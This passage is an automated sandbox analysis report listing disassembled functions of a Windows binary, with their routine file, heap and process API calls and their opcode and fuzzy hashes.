Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 44d638fc6d18a083c96c57e8070b694bf01419c29e2dab7aace882b566e396a1
Instruction ID: a119d078d61709ca5f4547489ae2255b98f21cbc4301851584a86b8460e2353d
Opcode Fuzzy Hash: 44d638fc6d18a083c96c57e8070b694bf01419c29e2dab7aace882b566e396a1
Instruction Fuzzy Hash: D2A001E66B9242FC390862926D46C3B021EC4C6B66B72896EFC5AD44D1B8A06C6D1875

Function 0023E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: d5ad75371c25f5e899b84d83041f901c383ae9563fd1dc05b425a020ddd31608
Instruction ID: a119d078d61709ca5f4547489ae2255b98f21cbc4301851584a86b8460e2353d
Opcode Fuzzy Hash: d5ad75371c25f5e899b84d83041f901c383ae9563fd1dc05b425a020ddd31608
Instruction Fuzzy Hash: D2A001E66B9242FC390862926D46C3B021EC4C6B66B72896EFC5AD44D1B8A06C6D1875

Function 0023E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 8e29553258c0385b85278bd89ab5033f275ce9355f4ee2d4bdfec2d47908021f
Instruction ID: a119d078d61709ca5f4547489ae2255b98f21cbc4301851584a86b8460e2353d
Opcode Fuzzy Hash: 8e29553258c0385b85278bd89ab5033f275ce9355f4ee2d4bdfec2d47908021f
Instruction Fuzzy Hash: D2A001E66B9242FC390862926D46C3B021EC4C6B66B72896EFC5AD44D1B8A06C6D1875

Function 0023E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E1E3

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

#, xrefs: 0023E1DD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: #
API String ID: 1269201914-1065395832
Opcode ID: 35f0de6fc30cd5f3f3472e7b810e2bae3a5bc2e496f6a5caef5e544a23a74cea
Instruction ID: a119d078d61709ca5f4547489ae2255b98f21cbc4301851584a86b8460e2353d
Opcode Fuzzy Hash: 35f0de6fc30cd5f3f3472e7b810e2bae3a5bc2e496f6a5caef5e544a23a74cea
Instruction Fuzzy Hash: D2A001E66B9242FC390862926D46C3B021EC4C6B66B72896EFC5AD44D1B8A06C6D1875

Function 0023E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E51F

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

(#, xrefs: 0023E519

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (#
API String ID: 1269201914-2223102492
Opcode ID: 66e296711ad886a22491f3a38dd306aeecadd911316df98b47a060abf79e2886
Instruction ID: 1f094ea7a914af447606c62c9a05b5d0ebffb83e7dc31756dfd6e10d592fba2b
Opcode Fuzzy Hash: 66e296711ad886a22491f3a38dd306aeecadd911316df98b47a060abf79e2886
Instruction Fuzzy Hash: 4CA011C2AB8202BC380822002C02C3B020EC0C2F2ABB2882EF802800C0B8800CAE0830

Function 0023E541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E51F

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

(#, xrefs: 0023E519

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (#
API String ID: 1269201914-2223102492
Opcode ID: 6ba539a1b5cf421e3ea61f0ab30a92bf65bbeca4950bda6b109179f3af2e036b
Instruction ID: 1f094ea7a914af447606c62c9a05b5d0ebffb83e7dc31756dfd6e10d592fba2b
Opcode Fuzzy Hash: 6ba539a1b5cf421e3ea61f0ab30a92bf65bbeca4950bda6b109179f3af2e036b
Instruction Fuzzy Hash: 4CA011C2AB8202BC380822002C02C3B020EC0C2F2ABB2882EF802800C0B8800CAE0830

Function 0023E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E51F

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

(#, xrefs: 0023E519

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (#
API String ID: 1269201914-2223102492
Opcode ID: 11e4d8c695bbbb8e2531368e117d3c69aa7c1f981fc650770a36e178073e31da
Instruction ID: 1f094ea7a914af447606c62c9a05b5d0ebffb83e7dc31756dfd6e10d592fba2b
Opcode Fuzzy Hash: 11e4d8c695bbbb8e2531368e117d3c69aa7c1f981fc650770a36e178073e31da
Instruction Fuzzy Hash: 4CA011C2AB8202BC380822002C02C3B020EC0C2F2ABB2882EF802800C0B8800CAE0830

Function 0023E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0023E51F

Part of subcall function 0023E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0023E8D0
Part of subcall function 0023E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0023E8E1

Strings

(#, xrefs: 0023E519

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (#
API String ID: 1269201914-2223102492
Opcode ID: 27876c3238548ef621364598a3e4390dc68b094b5578e1895eff7f9c0496350a
Instruction ID: 1f094ea7a914af447606c62c9a05b5d0ebffb83e7dc31756dfd6e10d592fba2b
Opcode Fuzzy Hash: 27876c3238548ef621364598a3e4390dc68b094b5578e1895eff7f9c0496350a
Instruction Fuzzy Hash: 4CA011C2AB8202BC380822002C02C3B020EC0C2F2ABB2882EF802800C0B8800CAE0830

Function 0024BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0024B7BB: GetOEMCP.KERNEL32(00000000,?,?,0024BA44,?), ref: 0024B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0024BA89,?,00000000), ref: 0024BC64
GetCPInfo.KERNEL32(00000000,0024BA89,?,?,?,0024BA89,?,00000000), ref: 0024BC77

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 3ee7c81f5f0b06d4d9ee360e8a5d55ac48463cab7e80595c57508faa71959c06
Instruction ID: f3449bcc815e44f99b64ba85c811b93531a6d7e15a6441e090d9370ba76e6c23
Opcode Fuzzy Hash: 3ee7c81f5f0b06d4d9ee360e8a5d55ac48463cab7e80595c57508faa71959c06
Instruction Fuzzy Hash: 52513270D203069EDB2E8F35C8856BABBF8EF41300F1844AED4968B261D734DA65CB90

Function 00229A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00229A50,?,?,00000000,?,?,00228CBC,?), ref: 00229BAB
GetLastError.KERNEL32(?,00000000,00228411,-00009570,00000000,000007F3), ref: 00229BB6

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: a153863836436f6a8bce3752d3ce9395d5d328643de0aeee733598868bf81863
Instruction ID: c1d7d2e604a1f20f0a77162aa13ebc399ae94e96437bef7fcfd6c3d0aef698a1
Opcode Fuzzy Hash: a153863836436f6a8bce3752d3ce9395d5d328643de0aeee733598868bf81863
Instruction Fuzzy Hash: 4B41F431924322EFDB24DF95F58456AB7E9FFD4314F148A2DE88183260D7B0ED948B91

Function 00221E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00221E55

Part of subcall function 00223BBA: __EH_prolog.LIBCMT ref: 00223BBF

_wcslen.LIBCMT ref: 00221EFD

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 8d6123dc3535ea3cc7b8a495b4e705eb78e7d5df210d4182be312170f097efab
Instruction ID: d6245a8ba8f0bc05e17583c17ffa21ff1b76cffc3e93f2ca3b1713a8be9ef3fb
Opcode Fuzzy Hash: 8d6123dc3535ea3cc7b8a495b4e705eb78e7d5df210d4182be312170f097efab
Instruction Fuzzy Hash: 3D316871924219AFCF15EFD8D945AEEFBF6AF18300F20006AE845A7251CB365E20CF60

Function 00229DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,002273BC,?,?,?,00000000), ref: 00229DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00229E70

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 2ae7244acc099eab9c654f29b382bc6b039d2368d2f751209faffd2f4c358eab
Instruction ID: c640e6f0563a546dfdd789d3fc725f9e8acefa2fdc19e43cc83bdc732e989836
Opcode Fuzzy Hash: 2ae7244acc099eab9c654f29b382bc6b039d2368d2f751209faffd2f4c358eab
Instruction Fuzzy Hash: 5C21F031268356ABC714DFB4D891AABBBE8AF51304F08485DF4C587181D339E96CDB62

Function 0022966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00229F27,?,?,0022771A), ref: 002296E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00229F27,?,?,0022771A), ref: 00229716

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dfe9177da4df044a846769d8ec8ee1ddbf32a0a03418a675dbdf88a61badf3cb
Instruction ID: fabc40aa983b092a575d7ebc6364de28abe128c603a067de60bc5524211789b3
Opcode Fuzzy Hash: dfe9177da4df044a846769d8ec8ee1ddbf32a0a03418a675dbdf88a61badf3cb
Instruction Fuzzy Hash: 7821E0B10243557EE3308EA5DC89FB7B3DCEB49320F000A19F995C21D1C7B4A8948A31

Function 00229E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00229EC7
GetLastError.KERNEL32 ref: 00229ED4

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 80ece0ea56547da6959370c57124aca4e25b61feeb122ebe369fc0d9664d5bde
Instruction ID: 8563fb84b55d4ea2ea80e30c26fe3337bb61ceb190daae5063dee404a6f42e3e
Opcode Fuzzy Hash: 80ece0ea56547da6959370c57124aca4e25b61feeb122ebe369fc0d9664d5bde
Instruction Fuzzy Hash: 4D112531620321BBD724CAA8E844BB6B3E8AB04370F500A2AE452D26D0D7B0EDE5C760

Function 00248E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00248E75

Part of subcall function 00248E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00244286,?,0000015D,?,?,?,?,00245762,000000FF,00000000,?,?), ref: 00248E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00261098,002217CE,?,?,00000007,?,?,?,002213D6,?,00000000), ref: 00248EB1

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: b3fd162a0473053e3366d168073605717b3e74814061a2d96bfd02f9cf2a73ab
Instruction ID: 53cf0bb7d407b5f4bc5af90d05a147378cf226e0d2b6d07dee4bd800b901eaed
Opcode Fuzzy Hash: b3fd162a0473053e3366d168073605717b3e74814061a2d96bfd02f9cf2a73ab
Instruction Fuzzy Hash: 71F09632731217A6DB2D6E65AC05B6F37589F81B70F244126F918A7191DFB0DD3089A0

Function 0023109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 002310AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 002310B2

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: b0d41551b3bca22f8f5017a34d438178918ef569d510d23f77a5db13ebd909d6
Instruction ID: b2143dcad95bdd9f40afb3448263427f30878a4864fe85f43fa6340676f2e5f2
Opcode Fuzzy Hash: b0d41551b3bca22f8f5017a34d438178918ef569d510d23f77a5db13ebd909d6
Instruction Fuzzy Hash: 5BE0D8B2B2024AA7CF0DCBB49C099EB73DDEA44345B109175E803E7101F930DE554A60

Function 0022A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0022A325,?,?,?,0022A175,?,00000001,00000000,?,?), ref: 0022A501

Part of subcall function 0022BB03: _wcslen.LIBCMT ref: 0022BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0022A325,?,?,?,0022A175,?,00000001,00000000,?,?), ref: 0022A532

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 64f855b9f388cd45938aabac8544ffadc45edf857638aff8368b28438f07245c
Instruction ID: a33e292f8e98ce2e0f37c4ff54e377e4bee111a021fe022376933eb879c189cb
Opcode Fuzzy Hash: 64f855b9f388cd45938aabac8544ffadc45edf857638aff8368b28438f07245c
Instruction Fuzzy Hash: E9F0303225031A7BDF025FA0EC45FDA376CAB04385F448451B945D51A0DB71DEA8DA50

Function 0022A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

